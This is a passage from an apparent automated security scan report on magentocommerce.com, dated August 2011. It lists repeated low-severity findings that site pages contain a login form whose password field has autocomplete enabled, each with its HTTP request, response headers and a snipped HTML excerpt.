Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fservices%2Fregister-for-training%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:13 GMT
Content-Length: 41049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.138. http://www.magentocommerce.com/services/testimonials  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/testimonials

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /services/testimonials HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175741; expires=Sat, 11-Aug-2012 15:02:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fservices%2Ftestimonials%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:21 GMT
Content-Length: 36222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.139. http://www.magentocommerce.com/services/training  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/training

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /services/training HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/media/screencasts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170923; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.5.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171066; expires=Sat, 11-Aug-2012 13:44:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:26 GMT
Content-Length: 37516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.140. http://www.magentocommerce.com/showcase  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /showcase

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /showcase HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176322; expires=Sat, 11-Aug-2012 15:12:02 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fshowcase%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:02 GMT
Content-Length: 50996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.141. http://www.magentocommerce.com/sitemap/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /sitemap/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /sitemap/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176452; expires=Sat, 11-Aug-2012 15:14:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fsitemap%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:12 GMT
Content-Length: 55319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.142. http://www.magentocommerce.com/support/magento-user-guide-book  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /support/magento-user-guide-book

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /support/magento-user-guide-book HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176223; expires=Sat, 11-Aug-2012 15:10:23 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fsupport%2Fmagento-user-guide-book%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:23 GMT
Content-Length: 39756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.143. http://www.magentocommerce.com/support/magento_core_api  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /support/magento_core_api

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /support/magento_core_api HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176236; expires=Sat, 11-Aug-2012 15:10:36 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fsupport%2Fmagento_core_api%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:36 GMT
Content-Length: 34959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.144. http://www.magentocommerce.com/support/overview  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /support/overview

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /support/overview HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176215; expires=Sat, 11-Aug-2012 15:10:15 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fsupport%2Foverview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:16 GMT
Content-Length: 37099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.145. http://www.magentocommerce.com/svn  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /svn

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /svn HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176280; expires=Sat, 11-Aug-2012 15:11:20 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A5%3A%22%2Fsvn%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:21 GMT
Content-Length: 33351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.146. http://www.magentocommerce.com/system-requirements  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /system-requirements

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /system-requirements HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176280; expires=Sat, 11-Aug-2012 15:11:20 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fsystem-requirements%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:20 GMT
Content-Length: 34053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.147. http://www.magentocommerce.com/translations  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /translations

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /translations HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176425; expires=Sat, 11-Aug-2012 15:13:45 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Ftranslations%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:45 GMT
Content-Length: 81713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.148. http://www.magentocommerce.com/ua  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /ua

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ua HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176554; expires=Sat, 11-Aug-2012 15:15:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fua%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:54 GMT
Content-Length: 73040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.149. http://www.magentocommerce.com/vi  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /vi

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /vi HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176552; expires=Sat, 11-Aug-2012 15:15:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fvi%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:53 GMT
Content-Length: 88806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.150. http://www.magentocommerce.com/virtual/download-magento/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /virtual/download-magento/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /virtual/download-magento/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176609; expires=Sat, 11-Aug-2012 15:16:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fvirtual%2Fdownload-magento%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.151. http://www.magentocommerce.com/virtual/enterprise-register/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /virtual/enterprise-register/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /virtual/enterprise-register/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176624; expires=Sat, 11-Aug-2012 15:17:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A29%3A%22%2Fvirtual%2Fenterprise-register%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32488

